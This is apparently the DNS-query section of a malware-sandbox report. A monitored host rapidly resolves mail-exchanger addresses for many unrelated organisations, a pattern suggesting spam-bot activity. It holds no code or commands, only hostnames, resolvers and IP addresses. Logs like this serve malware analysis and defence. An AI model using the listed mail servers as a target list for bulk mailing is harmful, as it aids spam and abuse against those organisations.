                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.017175913 CEST8.8.8.8192.168.2.30x8e4cNo error (0)mx2.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.018371105 CEST1.0.0.1192.168.2.30x8e4cNo error (0)d160221b.ess.barracudanetworks.com209.222.82.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.018371105 CEST1.0.0.1192.168.2.30x8e4cNo error (0)d160221b.ess.barracudanetworks.com209.222.82.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.018371105 CEST1.0.0.1192.168.2.30x8e4cNo error (0)d160221b.ess.barracudanetworks.com209.222.82.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.019776106 CEST8.8.8.8192.168.2.30x6f4cNo error (0)nomatech-net.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.019776106 CEST8.8.8.8192.168.2.30x6f4cNo error (0)nomatech-net.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.023786068 CEST149.112.112.112192.168.2.30x924eNo error (0)mail.yaxmail.net65.109.161.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.023786068 CEST149.112.112.112192.168.2.30x924eNo error (0)mail.yaxmail.net157.245.75.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.025549889 CEST1.0.0.1192.168.2.30x924eNo error (0)mx-in01.eu.retarus.com94.199.92.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.025563002 CEST149.112.112.112192.168.2.30x924eNo error (0)w4.aerospaceemail.com146.190.78.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.035650015 CEST8.8.4.4192.168.2.30x924eNo error (0)relay.mx.skynet.be195.238.20.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.037339926 CEST208.67.222.222192.168.2.30xa24eNo error (0)swc-tx-com.mx1-us.mailanyone.net208.70.129.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.037339926 CEST208.67.222.222192.168.2.30xa24eNo error (0)swc-tx-com.mx1-us.mailanyone.net72.35.12.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.039597034 CEST1.1.1.1192.168.2.30x924eNo error (0)mxa-00160c04.gslb.pphosted.com205.220.179.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.044298887 CEST8.8.8.8192.168.2.30xa24eNo error (0)mx3-hosting.jellyfish.systems162.255.118.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.045990944 CEST208.67.222.222192.168.2.30xa24eNo error (0)mxb-001ba701.gslb.pphosted.com148.163.156.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.047126055 CEST208.67.222.222192.168.2.30xa24eNo error (0)mxa-00168f01.gslb.pphosted.com67.231.148.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.049513102 CEST8.8.4.4192.168.2.30x7f4cNo error (0)tph-ca.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.049513102 CEST8.8.4.4192.168.2.30x7f4cNo error (0)tph-ca.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.051153898 CEST8.8.8.8192.168.2.30x7f4cNo error (0)adlerlacke-com01c.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.051153898 CEST8.8.8.8192.168.2.30x7f4cNo error (0)adlerlacke-com01c.mail.protection.outlook.com104.47.18.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.071224928 CEST1.0.0.1192.168.2.30x8e4cNo error (0)mx-01.eapps.comfilter10.antispamcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.071224928 CEST1.0.0.1192.168.2.30x8e4cNo error (0)filter10.antispamcloud.com38.89.254.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.092217922 CEST1.1.1.1192.168.2.30x8e4cNo error (0)thehealthline-ca.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.092217922 CEST1.1.1.1192.168.2.30x8e4cNo error (0)thehealthline-ca.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.122320890 CEST208.67.222.222192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.122320890 CEST208.67.222.222192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.122320890 CEST208.67.222.222192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.122320890 CEST208.67.222.222192.168.2.30x6f4cNo error (0)mx1.active24.com81.95.97.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.137327909 CEST9.9.9.9192.168.2.30x7f4cNo error (0)antispam.solunet.it185.149.189.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.159801006 CEST8.8.8.8192.168.2.30x7f4cNo error (0)w01a08c1.kasserver.com85.13.155.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.164190054 CEST8.8.8.8192.168.2.30x634eNo error (0)mail.nhs.uk150.70.226.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.176808119 CEST1.0.0.1192.168.2.30x142fNo error (0)mail.gsl-th.com116.68.154.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.195130110 CEST8.8.4.4192.168.2.30x8e4cNo error (0)mail.telecompost.it62.77.50.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.202286959 CEST208.67.220.220192.168.2.30xa24eNo error (0)w017197b.kasserver.com85.13.164.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.265496016 CEST149.112.112.112192.168.2.30x7f4cNo error (0)mx1.mail.ovh.net188.165.36.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.305143118 CEST1.1.1.1192.168.2.30x8e4cNo error (0)mail51.gullestrupnet.dk82.165.203.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.310554981 CEST208.67.222.222192.168.2.30x2dNo error (0)mx3.alien8.it138.201.5.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.310554981 CEST208.67.222.222192.168.2.30x2dNo error (0)mx3.alien8.it144.76.251.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.423384905 CEST208.67.220.220192.168.2.30x8e4cNo error (0)mail.pangea.org109.69.8.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.427848101 CEST149.112.112.112192.168.2.30x6f4cNo error (0)volny-cz-20mx1.eco-mx.czmx-ttc.eco-mx.czCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.427848101 CEST149.112.112.112192.168.2.30x6f4cNo error (0)mx-ttc.eco-mx.cz46.255.227.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.591491938 CEST1.1.1.1192.168.2.30x924eNo error (0)mx.voiaj.md87.255.69.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.603121996 CEST1.1.1.1192.168.2.30x64daNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.603121996 CEST1.1.1.1192.168.2.30x64daNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.644687891 CEST1.0.0.1192.168.2.30x6e6eNo error (0)alt3.aspmx.l.google.com172.253.113.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.662502050 CEST149.112.112.112192.168.2.30x6e6eNo error (0)mxa-001c3202.gslb.pphosted.com148.163.147.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.702647924 CEST208.67.220.220192.168.2.30x6e6eNo error (0)mx1.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.708498001 CEST149.112.112.112192.168.2.30x8e4cNo error (0)mailex.2980.comproxy.2980.com.dycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.708498001 CEST149.112.112.112192.168.2.30x8e4cNo error (0)proxy.2980.com.dycdn.com112.73.1.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.708498001 CEST149.112.112.112192.168.2.30x8e4cNo error (0)proxy.2980.com.dycdn.com103.43.86.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.73.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.68.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.73.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.73.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.73.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.730751991 CEST1.1.1.1192.168.2.30x6e6eNo error (0)uniparthenope-it.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.748240948 CEST1.1.1.1192.168.2.30x5f6eNo error (0)rcm-at.mail.protection.outlook.com104.47.51.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.748240948 CEST1.1.1.1192.168.2.30x5f6eNo error (0)rcm-at.mail.protection.outlook.com104.47.51.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:56.879395008 CEST9.9.9.9192.168.2.30x232fNo error (0)mail.balkam-group.com31.13.217.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.117790937 CEST1.1.1.1192.168.2.30x1ba2No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.214267015 CEST1.1.1.1192.168.2.30x91a5No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.501127958 CEST1.1.1.1192.168.2.30xc0eNo error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.501127958 CEST1.1.1.1192.168.2.30xc0eNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.501127958 CEST1.1.1.1192.168.2.30xc0eNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.501127958 CEST1.1.1.1192.168.2.30xc0eNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.574841976 CEST1.1.1.1192.168.2.30x3592No error (0)lisa.neostrada.nl66.228.38.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.621506929 CEST1.1.1.1192.168.2.30xf178Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.647784948 CEST1.1.1.1192.168.2.30xec76No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.812113047 CEST208.84.67.208192.168.2.30x95b3No error (0)mx0a-001a4e01.pphosted.com208.84.65.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.813895941 CEST66.228.38.167192.168.2.30x86b3No error (0)mail.vlad.be185.94.230.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.917609930 CEST213.251.128.129192.168.2.30x89b5No error (0)mx3.ovh.net91.121.56.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.961538076 CEST212.109.32.15192.168.2.30x89b5No error (0)mx4.svitonline.com62.64.120.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.993633986 CEST74.202.142.162192.168.2.30xe1d0No error (0)mx1.spray.mail2world.com35.167.34.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.993633986 CEST74.202.142.162192.168.2.30xe1d0No error (0)mx1.spray.mail2world.com34.226.24.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.993633986 CEST74.202.142.162192.168.2.30xe1d0No error (0)mx1.spray.mail2world.com44.237.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:57.993633986 CEST74.202.142.162192.168.2.30xe1d0No error (0)mx1.spray.mail2world.com54.88.152.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.006120920 CEST1.1.1.1192.168.2.30xe698No error (0)ns1-proddns.glbdns.o365filtering.com104.47.118.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.006120920 CEST1.1.1.1192.168.2.30xe698No error (0)ns1-proddns.glbdns.o365filtering.com104.47.118.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.73.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.73.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.73.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.68.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.68.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.200958967 CEST104.47.118.145192.168.2.30x5de6No error (0)paradigma-biz.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.202318907 CEST104.47.118.145192.168.2.30x5de6No error (0)rightstartmortgage-com.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.202318907 CEST104.47.118.145192.168.2.30x5de6No error (0)rightstartmortgage-com.mail.protection.outlook.com104.47.59.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.383171082 CEST1.1.1.1192.168.2.30xb501No error (0)srv4.rejecthost.com165.22.204.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.385977983 CEST1.1.1.1192.168.2.30x69f4No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.417678118 CEST1.1.1.1192.168.2.30x47a5No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.417745113 CEST1.1.1.1192.168.2.30x47a5No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.417856932 CEST1.1.1.1192.168.2.30x47a5No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.9.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.458916903 CEST104.47.118.145192.168.2.30x9107No error (0)victoriamansion-org.mail.protection.outlook.com52.101.42.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.463140011 CEST162.159.24.198192.168.2.30x9107No error (0)rjii.net.1.0001.arsmtp.com8.31.233.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.642102957 CEST8.8.4.4192.168.2.30xf520No error (0)deepakfasteners.com208.91.199.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.648082018 CEST1.0.0.1192.168.2.30xe922No error (0)mailgw02.host.it185.201.64.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:58.661925077 CEST149.112.112.112192.168.2.30xf520No error (0)qiye163mx01.mxmail.netease.com13.52.168.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.009737015 CEST149.112.112.112192.168.2.30x548No error (0)mx2.hc815-95.ap.iphmx.com207.54.83.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.009737015 CEST149.112.112.112192.168.2.30x548No error (0)mx2.hc815-95.ap.iphmx.com207.54.75.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.092107058 CEST1.1.1.1192.168.2.30x9acNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.098278046 CEST1.1.1.1192.168.2.30xe922No error (0)mail.aspea.de212.112.246.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.144004107 CEST1.1.1.1192.168.2.30x548Name error (3)iaxs.net.mx1.visi.rcimx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.171715975 CEST1.1.1.1192.168.2.30x469No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.68.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.73.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.68.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.73.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.240246058 CEST104.47.118.145192.168.2.30x3969No error (0)whitemc-it.mail.protection.outlook.com52.101.73.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.343056917 CEST1.1.1.1192.168.2.30xf0e9No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.343056917 CEST1.1.1.1192.168.2.30xf0e9No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.343056917 CEST1.1.1.1192.168.2.30xf0e9No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.343056917 CEST1.1.1.1192.168.2.30xf0e9No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.386785030 CEST1.1.1.1192.168.2.30xdf5aNo error (0)ns-ut7.proofpoint.com148.163.128.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.537879944 CEST162.251.82.122192.168.2.30xd5d2Server failure (2)deepakfasteners.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.579952955 CEST148.163.128.50192.168.2.30x3194No error (0)mxb-00752701.gslb.pphosted.com205.220.185.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.681926012 CEST1.1.1.1192.168.2.30x3f33Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.704783916 CEST1.1.1.1192.168.2.30xa2e4No error (0)ns23.superhosting.bg91.196.124.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.873373985 CEST1.1.1.1192.168.2.30xc89aNo error (0)ns-547.awsdns-04.net205.251.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.933829069 CEST1.1.1.1192.168.2.30x2c6dNo error (0)cpmteam.com172.67.188.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.933829069 CEST1.1.1.1192.168.2.30x2c6dNo error (0)cpmteam.com104.21.32.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:59.963687897 CEST1.1.1.1192.168.2.30xfe0cName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.040406942 CEST91.196.124.12192.168.2.30x41bbNo error (0)vision-bg.com91.196.125.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com164.90.197.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com147.182.189.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com147.182.180.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com164.90.197.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com147.182.160.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com164.90.197.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com147.182.130.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.049616098 CEST205.251.194.35192.168.2.30xbdd0No error (0)mx37.mb5p.com164.90.197.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.069205046 CEST148.163.128.50192.168.2.30xbdd0No error (0)mxa-00752701.gslb.pphosted.com205.220.185.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.082197905 CEST148.163.128.50192.168.2.30xb1d2No error (0)mxa-00220401.gslb.pphosted.com148.163.152.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.098195076 CEST170.55.6.3192.168.2.30xbdd0No error (0)mail.harlandale.net170.55.6.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.105568886 CEST64.98.148.137192.168.2.30xbdd0No error (0)mx.blog-galaxy.com108.61.164.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.129157066 CEST192.252.144.35192.168.2.30xb1d2No error (0)mail.bulldognews.com192.252.144.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.227993011 CEST217.69.139.112192.168.2.30xbdd0No error (0)mxs.my.com95.163.54.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.530476093 CEST1.1.1.1192.168.2.30x1b11No error (0)ns1a.btitalia.it217.220.57.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.607559919 CEST1.1.1.1192.168.2.30xbd6dNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:00.607559919 CEST1.1.1.1192.168.2.30xbd6dNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
